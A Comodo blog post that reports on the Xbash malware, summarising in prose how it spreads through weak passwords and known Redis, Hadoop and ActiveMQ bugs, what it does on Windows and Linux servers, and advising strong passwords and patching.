Learn about Zero Trust Architecture
Impenetrable cybersecurity without sacrificing usability
Gain detailed visibility into all your endpoints activities
Harden applications and hardware environments
Immediate and continuous response to incidents
Close the window of time your data could be exposed
Get your Comodo solutions setup, deployed or optimized
Control access to malicious websites
Defend from any internet based threats
Stop email threats before it enters your inbox
Preserve and protect your sensitive data
Keep your website running fast and malware free
Add encryption to your websites
Automated certificate mgmt. platform
Secure private intranet environments
Digital signature solutions for cloud apps
Encrypt emails for senders and recipients
Stay compliant with PCI DSS
Trusted authentication for IoT devices
Francisco Partners a leading technology-focused private equity fund, has acquired a majority stake in Comodo’s certificate authority business. Newly renamed from Comodo CA Limited to Sectigo Limited. Privacy Policies, Trademarks, Patents and Terms & Conditions are available on Sectigo Limited’s web site.
Meet the people behind the direction for Comodo
Get the latest news about Comodo
People are the key to achievement and prosperity
Stay up to date with our on-demand webinars
Worldwide: Sales, Support and General Inquiries
Schedule a live demonstration of our solutions
Need immediate help? Call 1-888-551-1531
Instantly removes viruses to keep your PC virus free
Experience true mobile security on your mobile apple devices
Secure Internet Browser based on Chrome
Chrome browser internet security extension
Submit a ticket to our support team
Share any product bugs or security flaws
Collaborate with research experts on data sets
Valkyrie Threat Intelligence Plugins
Valkyrie Threat Intelligence APIs
Recently discovered Xbash malware fits an emerging trend. It’s not just one type of malware, it’s at least four different types. It’s a worm! It’s ransomware! It’s a botnet! It’s a cryptominer! It slices and it dices, and it can be yours for four easy payments of two Bitcoins! Well, I haven’t seen infomercial-style ads on the Dark Web yet, nor have I seen Xbash for sale there. But you can catch my drift, eh?
It also targets both Windows and Linux. It’s not that there’s a Windows version and a Linux version… the same malware with the same payload will try different exploits and malicious activities based on whether the infected target is determined to be Windows or Linux. I use a Linux distro on my home office PC for my everyday work and leisure, but I’m an outlier. Rarely do consumers use Linux directly except perhaps for the Linux kernel on their Android devices. So targeting x86 versions of Linux suggests that the cyber attackers intend to focus on servers, including those which don’t run Windows Server. Attack Windows Server machines running applications like Active Directory and IIS, and attack Linux machines running applications like Apache, and you’ve got the large majority of internet servers around the world.
Originally developed in Python and ported into Linux ELF executables, Xbash tries to infect a system by exploiting weak passwords and well known vulnerabilities such as bugs in Redis services running on either major platform. Xbash appears to be malware that’s in constant development, so the cyber attacker’s command and control servers may transmit malware that’s designed to exploit new and different vulnerabilities in the future.
Researchers believe that the Iron Group, otherwise known as Rocke, is behind Xbash. Iron Group was originally discovered in 2017. The researchers wrote:
“Previously the Iron Group developed and spread cryptocurrency miners or cryptocurrency transaction hijacking trojans mainly intended for Microsoft Windows, with only a few for Linux. Instead, Xbash aimed on discovering unprotected services, deleting victim’s MySQL, PostgreSQL and MongoDB databases, and ransom for Bitcoins. Xbash uses three known vulnerabilities in Hadoop, Redis and ActiveMQ for self-propagation or infecting Windows systems.”
Xbash is definitely an Advanced Persistent Threat. The cyber attackers scan IP addresses on both the internet and on intranets and they appear to be choosing their targets based on certain criteria. Unlike Iron’s previous types of cyber attacks, it seems that making money from ransomware and cryptomining is just one of many of their motives, and their other motives seem kind of mysterious. The cyber attackers really haven’t been making much money from Xbash so far, and it seems deliberate. The ransomware profits seem to only be about $6,000 USD worth of Bitcoin so far. Researcher Jen Miller-Osborn said:
“We agree that it seems odd. Though there is no way for the victims to know the attackers did not create copies of their files to return (as it claims to). It’s only once they’ve paid, and the attackers don’t restore the files, that the victims know their files are truly gone. The attackers may be happy enough to make whatever profits they can without the added step of having to store, track, and return the data.”
Money is certainly a factor, but perhaps the lust for power is an even greater one. Look at what they can leverage with their command and control servers and their ever growing botnet!
Here’s what Xbash does if it has determined that it has infected a Windows machine. Xbash goes through Redis and will deploy Windows attacks if a web server’s location in a file system is typical of Windows, such as in the Program Files folder. A Windows startup item will be created, and a malicious HTML or a Scriptlet file is downloaded from the command and control servers. From there, JavaScript or VBScript code will be used to execute PowerShell to run a malicious PE executable or PE DLL file. Once thoroughly inside a Windows target, further malicious code and instructions from the command and control servers make Xbash show its not-so-charming cryptomining and worm aspects.
If by exploiting Redis, Xbash finds a web server in a location typical of a Linux operating system, such as in the usr/local/ folder, Tux mode commences! (Only I seem to call it Tux mode. I apologize to penguins everywhere.) A Linux cronjob is created, malicious JavaScript or VBScript payloads are downloaded from the command and control servers and are executed. Xbash will look for databases to delete, such as with MongoDB or MySQL. On A Linux system, Xbash will go on to show its equally not-so-charming ransomware and botnet aspects. Each and every side is utterly non-photogenic, darling.
So Xbash doesn’t seem to be a golddigger, but it will inevitably try to exploit many new vulnerabilities in the future and try a variety of different activities so that the Iron Group can have internet servers around the world under their thumb. Whatever forms Xbash takes in the future, making sure that you use much more secure passwords in your OSes, web servers, and web databases, and installing the latest patches will certainly make it more difficult for your network to become the latest Xbash victim.
Tags: Is Xbash the Swiss Army Knife of Windows and Linux malware?,botnet ransomware,windows and linux,xbash malware
Sign up to our cyber security newsletter
Comodo Cybersecurity would like to keep in touch with you about cybersecurity issues, as well as products and services available. Please sign up to receive occasional communications. As a cybersecurity company, we take your privacy and security very seriously and have strong safeguards in place to protect your information.
See how your organization scores against cybersecurity threats